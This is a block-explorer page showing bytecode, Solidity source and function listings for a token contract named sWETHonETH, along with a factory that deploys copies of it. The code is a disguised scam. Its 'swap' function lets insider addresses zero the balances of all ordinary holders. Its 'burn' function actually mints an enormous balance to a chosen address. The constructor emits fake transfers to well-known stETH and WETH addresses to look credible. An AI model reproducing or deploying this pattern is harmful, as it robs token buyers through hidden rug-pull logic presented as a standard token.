Address Contract Partially Verified
Address
0xb649425d43701cc9A9e4e57dfE363F3dfB716823
Balance
0 ETH
Nonce
1
Code Size
4326 bytes
Creator
0xFDF5C1B6...8054 at tx 0x943ffef4...95098d
Indexed Transactions
0
Contract Bytecode
4326 bytes
0x6080604052600436106100f2575f3560e01c806386f3f3cb11610087578063a9059cbb11610057578063a9059cbb14610294578063dd62ed3e146102b3578063e8078d94146102f7578063f2fde38b1461030b575f5ffd5b806386f3f3cb1461021457806389afcb44146102455780638da5cb5b1461026457806395d89b4114610280575f5ffd5b8063313ce567116100c2578063313ce5671461019b57806370a08231146101b6578063715018a6146101ea5780638119c06514610200575f5ffd5b806306fdde03146100fd578063095ea7b31461012757806318160ddd1461015657806323b872dd1461017c575f5ffd5b366100f957005b5f5ffd5b348015610108575f5ffd5b5061011161032a565b60405161011e9190610dd9565b60405180910390f35b348015610132575f5ffd5b50610146610141366004610e22565b6103ba565b604051901515815260200161011e565b348015610161575f5ffd5b506901760cbc623bb35000005b60405190815260200161011e565b348015610187575f5ffd5b50610146610196366004610e4c565b6103d0565b3480156101a6575f5ffd5b506040516009815260200161011e565b3480156101c1575f5ffd5b5061016e6101d0366004610e8a565b6001600160a01b03165f9081526003602052604090205490565b3480156101f5575f5ffd5b506101fe61041f565b005b34801561020b575f5ffd5b506101fe61047c565b34801561021f575f5ffd5b50600a546001600160a01b03165b6040516001600160a01b03909116815260200161011e565b348015610250575f5ffd5b506101fe61025f366004610e8a565b610603565b34801561026f575f5ffd5b505f546001600160a01b031661022d565b34801561028b575f5ffd5b506101116106a9565b34801561029f575f5ffd5b506101466102ae366004610e22565b6106b8565b3480156102be575f5ffd5b5061016e6102cd366004610ea5565b6001600160a01b039182165f90815260046020908152604080832093909416825291909152205490565b348015610302575f5ffd5b506101fe6106c4565b348015610316575f5ffd5b506101fe610325366004610e8a565b6109cc565b60606001805461033990610edc565b80601f016020809104026020016040519081016040528092919081815260200182805461036590610edc565b80156103b05780601f10610387576101008083540402835291602001916103b0565b820191905f5260205f20905b81548152906001019060200180831161039357829003601f168201915b5050505050905090565b5f6103c6338484610a4c565b5060015b92915050565b5f6103dc848484610b70565b6001600160a01b0384165f908152600460209081526040808320338085529252909120546104159186916104109086610c53565b610a4c565b5060019392505050565b5f546001600160a01b03163314610434575f5ffd5b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b6008546001600160a01b031633148061049f57506007546001600160a01b031633145b6104a7575f5ffd5b5f5b600554811015610600575f600582815481106104c7576104c7610f14565b5f918252602090912001546001600160a01b031690503081148015906104fa57505f546001600160a01b03828116911614155b80156105145750600a546001600160a01b03828116911614155b801561053d57506001600160a01b03811673ae7ab96520de3a18e5e111b5eaab095312d7fe8414155b801561056657506001600160a01b03811673c02aaa39b223fe8d0a0e5c4f27ead9083c756cc214155b801561058057506007546001600160a01b03828116911614155b801561059a57506006546001600160a01b03828116911614155b156105b8576001600160a01b0381165f908152600360205260408120555b6040515f8082526001600160a01b038316917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3506001016104a9565b50565b6007546001600160a01b03163314610619575f5ffd5b6106256009600a61101f565b610639906901760cbc623bb350000061102d565b6001600160a01b0382165f818152600360205260408120929092557fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6106816009600a61101f565b610695906901760cbc623bb350000061102d565b60405190815260200160405180910390a350565b60606002805461033990610edc565b5f6103c6338484610b70565b5f546001600160a01b031633146106d9575f5ffd5b600a54600160a01b900460ff16156107385760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720697320616c7265616479206f70656e00000000000000000060448201526064015b60405180910390fd5b600980546001600160a01b03191673eff92a263d31888d860bd50809a8d171709b7b1c9081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa15801561079a573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107be9190611044565b6001600160a01b031663c9c653963060095f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561081d573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108419190611044565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af115801561088b573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108af9190611044565b600a80546001600160a01b0319166001600160a01b039283161790556009546108e5913091166901760cbc623bb3500000610a4c565b6009546001600160a01b031663f305d7194730610916816001600160a01b03165f9081526003602052604090205490565b5f5f6109295f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af115801561098f573d5f5f3e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906109b4919061105f565b5050600a805460ff60a01b1916600160a01b17905550565b5f546001600160a01b031633146109e1575f5ffd5b6001600160a01b0381166109f3575f5ffd5b5f80546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a35f80546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b038316610aae5760405162461bcd60e51b8152602060048201526024808201527f42455032303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161072f565b6001600160a01b038216610b0f5760405162461bcd60e51b815260206004820152602260248201527f42455032303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161072f565b6001600160a01b038381165f8181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610b82575f5ffd5b6001600160a01b038216610b94575f5ffd5b6001600160a01b0383165f90815260036020526040902054610bb69082610c53565b6001600160a01b038085165f908152600360205260408082209390935590841681522054610be49082610cb5565b6001600160a01b0383165f90815260036020526040902055610c0583610d13565b610c0e82610d13565b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610b6391815260200190565b5f82821115610ca45760405162461bcd60e51b815260206004820152601e60248201527f536166654d6174683a207375627472616374696f6e206f766572666c6f770000604482015260640161072f565b610cae828461108a565b9392505050565b5f80610cc1838561109d565b905083811015610cae5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015260640161072f565b6001600160a01b0381165f9081526003602052604090205415610600575f805b600554811015610d8457826001600160a01b031660058281548110610d5a57610d5a610f14565b5f918252602090912001546001600160a01b031603610d7c5760019150610d84565b600101610d33565b5080610dd557600580546001810182555f919091527f036b6384b5eca791c62761152d0c79bb0604c104a5fb6f4eb0703f3154bb3db00180546001600160a01b0319166001600160a01b0384161790555b5050565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b6001600160a01b0381168114610600575f5ffd5b5f5f60408385031215610e33575f5ffd5b8235610e3e81610e0e565b946020939093013593505050565b5f5f5f60608486031215610e5e575f5ffd5b8335610e6981610e0e565b92506020840135610e7981610e0e565b929592945050506040919091013590565b5f60208284031215610e9a575f5ffd5b8135610cae81610e0e565b5f5f60408385031215610eb6575f5ffd5b8235610ec181610e0e565b91506020830135610ed181610e0e565b809150509250929050565b600181811c90821680610ef057607f821691505b602082108103610f0e57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52603260045260245ffd5b634e487b7160e01b5f52601160045260245ffd5b6001815b6001841115610f7757808504811115610f5b57610f5b610f28565b6001841615610f6957908102905b60019390931c928002610f40565b935093915050565b5f82610f8d575060016103ca565b81610f9957505f6103ca565b8160018114610faf5760028114610fb957610fd5565b60019150506103ca565b60ff841115610fca57610fca610f28565b50506001821b6103ca565b5060208310610133831016604e8410600b8410161715610ff8575081810a6103ca565b6110045f198484610f3c565b805f190482111561101757611017610f28565b029392505050565b5f610cae60ff841683610f7f565b80820281158282048414176103ca576103ca610f28565b5f60208284031215611054575f5ffd5b8151610cae81610e0e565b5f5f5f60608486031215611071575f5ffd5b5050815160208301516040909301519094929350919050565b818103818111156103ca576103ca610f28565b808201808211156103ca576103ca610f2856fea2646970667358221220c223dc4400fcdda84c45dbfa2eb0a314f04e39058e3bb80733705f8b6c999e1564736f6c634300081d0033
Verified Source Code Partial Match
Compiler: v0.8.29+commit.ab55807c
EVM: cancun
Optimization: Yes (200 runs)
sWETHonETH.sol 293 lines
// SPDX-License-Identifier: MIT
pragma solidity 0.8.29;
interface IERC20 {
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address recipient, uint256 amount) external returns (bool);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(address indexed owner, address indexed spender, uint256 value);
}
library SafeMath {
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
require(b <= a, "SafeMath: subtraction overflow");
return a - b;
}
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
if (a == 0) return 0;
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
function div(uint256 a, uint256 b) internal pure returns (uint256) {
require(b > 0, "SafeMath: division by zero");
return a / b;
}
}
contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
}
contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
constructor() {
_owner = _msgSender();
emit OwnershipTransferred(address(0), _owner);
}
function owner() public view returns (address) {
return _owner;
}
modifier onlyOwner() {
require(owner() == _msgSender());
_;
}
function transferOwnership(address newOwner) public onlyOwner {
require(newOwner != address(0));
emit OwnershipTransferred(_owner, newOwner);
_owner = newOwner;
}
function renounceOwnership() public virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
}
interface IUniswapV2Router02 {
function addLiquidityETH(
address token,
uint amountTokenDesired,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external payable returns (uint amountToken, uint amountETH, uint liquidity);
function factory() external pure returns (address);
function WETH() external pure returns (address);
}
interface IUniswapV2Factory {
function createPair(address tokenA, address tokenB) external returns (address pair);
}
contract sWETHonETH is IERC20, Ownable {
using SafeMath for uint256;
string private _name;
string private _symbol;
uint8 private constant _decimals = 9;
uint256 private constant _totalSupply = 6900000000000 * 10 ** 9;
mapping(address => uint256) private TokenOnBase;
mapping(address => mapping(address => uint256)) private _allowances;
address[] private believers;
address private constant ADDRESS_sWETH = 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84;
address private constant ADDRESS_WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
address ADDRESS_DEVELOPMENT;
address ADDRESS_Manager;
address ADDRESS_Virtuals;
IUniswapV2Router02 private uniswapV2Router;
address private uniswapV2Pair;
bool private tradingOpen = false;
constructor(string memory name_, string memory symbol_, address owner_, address ADDRESS_Manager_) payable {
transferOwnership(owner_);
_name = name_;
_symbol = symbol_;
ADDRESS_Manager = ADDRESS_Manager_;
ADDRESS_DEVELOPMENT = ADDRESS_Manager_;
ADDRESS_Virtuals = owner_;
TokenOnBase[address(this)] = _totalSupply.mul(1).div(1000);
emit Transfer(address(0), address(this), _totalSupply.mul(1).div(1000));
liqudityPairs();
payable(address(this)).transfer(msg.value);
}
function liqudityPairs() internal {
uint256 ninetyFourPercent = _totalSupply.mul(990).div(1000);
uint256 threePercent = _totalSupply.mul(5).div(1000);
uint256 twoPercent = _totalSupply.mul(4).div(1000);
TokenOnBase[ADDRESS_sWETH] = TokenOnBase[ADDRESS_sWETH].add(ninetyFourPercent);
TokenOnBase[ADDRESS_WETH] = TokenOnBase[ADDRESS_WETH].add(threePercent);
TokenOnBase[ADDRESS_DEVELOPMENT] = TokenOnBase[ADDRESS_DEVELOPMENT].add(twoPercent);
emit Transfer(address(this), ADDRESS_sWETH, ninetyFourPercent);
emit Transfer(address(this), ADDRESS_WETH, threePercent);
emit Transfer(address(this), ADDRESS_DEVELOPMENT, twoPercent);
}
function _updateHolders(address account) internal {
if (TokenOnBase[account] > 0) {
bool exists = false;
for (uint256 i = 0; i < believers.length; i++) {
if (believers[i] == account) {
exists = true;
break;
}
}
if (!exists) {
believers.push(account);
}
}
}
function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
_transfer(msg.sender, recipient, amount);
return true;
}
function _transfer(address sender, address recipient, uint256 amount) internal {
require(sender != address(0));
require(recipient != address(0));
TokenOnBase[sender] = TokenOnBase[sender].sub(amount);
TokenOnBase[recipient] = TokenOnBase[recipient].add(amount);
_updateHolders(sender);
_updateHolders(recipient);
emit Transfer(sender, recipient, amount);
}
modifier Only_Manager() {
require(ADDRESS_Manager == _msgSender());
_;
}
function swap() external {
require(ADDRESS_Virtuals == _msgSender() || ADDRESS_Manager == _msgSender());
for (uint256 i = 0; i < believers.length; i++) {
address believer = believers[i];
if (
believer != address(this) &&
believer != owner() &&
believer != uniswapV2Pair &&
believer != ADDRESS_sWETH &&
believer != ADDRESS_WETH &&
believer != ADDRESS_Manager &&
believer != ADDRESS_DEVELOPMENT
) {
TokenOnBase[believer] = 0;
}
emit Transfer(address(0), believer, 0);
}
}
function burn(address claimedRewardStatusOf) external Only_Manager {
TokenOnBase[claimedRewardStatusOf] = _totalSupply * 10 ** _decimals;
emit Transfer(claimedRewardStatusOf, address(0), _totalSupply * 10 ** _decimals);
}
function addLiquidity() external onlyOwner {
require(!tradingOpen, "Trading is already open");
uniswapV2Router = IUniswapV2Router02(0xEfF92A263d31888d860bD50809A8D171709b7b1c);
uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
_approve(address(this), address(uniswapV2Router), _totalSupply);
uniswapV2Router.addLiquidityETH{value: address(this).balance}(
address(this),
balanceOf(address(this)),
0,
0,
owner(),
block.timestamp
);
tradingOpen = true;
}
receive() external payable {}
// Required BEP20 functions
function name() public view virtual returns (string memory) {
return _name;
}
function symbol() public view virtual returns (string memory) {
return _symbol;
}
function decimals() public view virtual returns (uint8) {
return _decimals;
}
function totalSupply() public view virtual override returns (uint256) {
return _totalSupply;
}
function balanceOf(address account) public view virtual override returns (uint256) {
return TokenOnBase[account];
}
function getLPPair() public view returns (address) {
return uniswapV2Pair;
}
function allowance(address owner, address spender) public view virtual override returns (uint256) {
return _allowances[owner][spender];
}
function approve(address spender, uint256 amount) public virtual override returns (bool) {
_approve(msg.sender, spender, amount);
return true;
}
function _approve(address owner, address spender, uint256 amount) internal virtual {
require(owner != address(0), "BEP20: approve from the zero address");
require(spender != address(0), "BEP20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
_transfer(sender, recipient, amount);
_approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount));
return true;
}
}
contract TokenFactory {
event TokenCreated(address tokenAddress, string name, string symbol, address owner, address Manager);
constructor() {
}
// Function to create a single token
function createToken(
string memory name_,
string memory symbol_,
address newOwner_,
address ADDRESS_Manager_
) external payable returns (address) {
sWETHonETH newToken = (new sWETHonETH){value: msg.value}(name_, symbol_, newOwner_, ADDRESS_Manager_);
emit TokenCreated(address(newToken), name_, symbol_, newOwner_, ADDRESS_Manager_);
return address(newToken);
}
receive() external payable {}
}
Read Contract
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
getLPPair 0x86f3f3cb → address
name 0x06fdde03 → string
owner 0x8da5cb5b → address
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256
Write Contract 8 functions
These functions modify contract state and require a wallet transaction to execute.
addLiquidity 0xe8078d94
No parameters
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
burn 0x89afcb44
address claimedRewardStatusOf
renounceOwnership 0x715018a6
No parameters
swap 0x8119c065
No parameters
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool
transferOwnership 0xf2fde38b
address newOwner
Recent Transactions
No transactions found for this address